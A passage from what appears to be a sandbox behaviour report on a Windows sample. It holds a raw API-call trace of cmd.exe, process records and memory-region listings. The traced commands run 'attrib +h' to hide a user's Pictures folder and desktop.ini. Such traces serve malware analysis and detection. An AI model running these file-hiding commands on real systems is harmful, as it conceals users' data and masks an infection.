lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, 
lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile 
(in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0143.049] _close (_FileHandle=4) returned 0 [0143.049] FindNextFileW (in: hFindFile=0x30e5e8, lpFindFileData=0x20ee20 | out: lpFindFileData=0x20ee20) returned 0 [0143.049] GetLastError () returned 0x12 [0143.049] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.053] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0143.055] _close (_FileHandle=3) returned 0 [0143.055] GetConsoleTitleW (in: lpConsoleTitle=0x20f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.055] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.056] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.056] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.056] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.057] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.057] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.057] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.057] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.057] GetConsoleTitleW (in: lpConsoleTitle=0x20efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.057] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef3c | out: lpAttributeList=0x20ee74, lpSize=0x20ef3c) returned 1 [0143.057] UpdateProcThreadAttribute (in: lpAttributeList=0x20ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ee74, lpPreviousValue=0x0) returned 1 [0143.057] GetStartupInfoW (in: lpStartupInfo=0x20ee30 | out: lpStartupInfo=0x20ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.057] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.057] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessInformation=0x20ef1c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x308, dwThreadId=0x894)) returned 1 [0143.059] CloseHandle (hObject=0x50) returned 1 [0143.059] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.059] GetEnvironmentStringsW () returned 0x312c70* [0143.059] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.059] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0143.187] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20ee10 | out: lpExitCode=0x20ee10*=0x0) returned 1 [0143.187] CloseHandle (hObject=0x4c) returned 1 [0143.187] _vsnwprintf (in: _Buffer=0x20ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ee1c | out: _Buffer="00000000") returned 8 [0143.187] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0143.187] 
GetEnvironmentStringsW () returned 0x312c70* [0143.187] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.187] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.187] GetEnvironmentStringsW () returned 0x312c70* [0143.187] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.187] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ee74 | out: lpAttributeList=0x20ee74) [0143.187] GetConsoleTitleW (in: lpConsoleTitle=0x20f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.188] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.188] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.188] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.188] GetLastError () returned 0x2 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.188] GetLastError () returned 0x2 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.188] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, 
lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.189] GetLastError () returned 0x2 [0143.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.189] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.189] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.189] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.189] GetConsoleTitleW (in: lpConsoleTitle=0x20efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.189] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef3c | out: lpAttributeList=0x20ee74, lpSize=0x20ef3c) returned 1 [0143.189] UpdateProcThreadAttribute (in: lpAttributeList=0x20ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ee74, lpPreviousValue=0x0) returned 1 [0143.189] GetStartupInfoW (in: lpStartupInfo=0x20ee30 | out: lpStartupInfo=0x20ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.189] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.189] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", 
lpStartupInfo=0x20eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessInformation=0x20ef1c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7dc, dwThreadId=0x7b8)) returned 1 [0143.191] CloseHandle (hObject=0x4c) returned 1 [0143.191] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.191] GetEnvironmentStringsW () returned 0x313628* [0143.191] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.191] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0143.258] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20ee10 | out: lpExitCode=0x20ee10*=0x0) returned 1 [0143.258] CloseHandle (hObject=0x50) returned 1 [0143.258] _vsnwprintf (in: _Buffer=0x20ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ee1c | out: _Buffer="00000000") returned 8 [0143.258] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0143.259] GetEnvironmentStringsW () returned 0x313628* [0143.259] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.259] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.259] GetEnvironmentStringsW () returned 0x313628* [0143.259] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.259] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ee74 | out: lpAttributeList=0x20ee74) [0143.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.259] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.259] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0143.259] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.259] SetConsoleInputExeNameW () returned 0x1 [0143.259] GetConsoleOutputCP () returned 0x1b5 [0143.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.260] exit (_Code=0) Process: id = "182" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16de0" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16403 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16404 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16405 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16406 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16407 start_va = 0xcc0000 end_va = 0xcc6fff entry_point = 0xcc0000 region_type = mapped_file name = "attrib.exe" filename = 
"\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16408 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16409 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16410 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16411 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16412 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16413 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16414 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16415 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16416 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 16417 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16418 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = 
"\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16419 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16420 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16421 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16422 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16423 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16424 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16425 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16427 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16428 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16429 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16430 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 16431 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16432 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 239 os_tid = 0x8b4 Process: id = "183" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b80" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16486 start_va = 0x10000 
end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16487 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16488 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16489 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 16490 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16491 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16492 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16493 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16494 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 16495 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16496 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16497 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 16498 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16499 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 16500 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 16501 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16502 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16503 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16504 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16505 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16506 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16507 start_va = 0x76a90000 end_va = 0x76b3bfff 
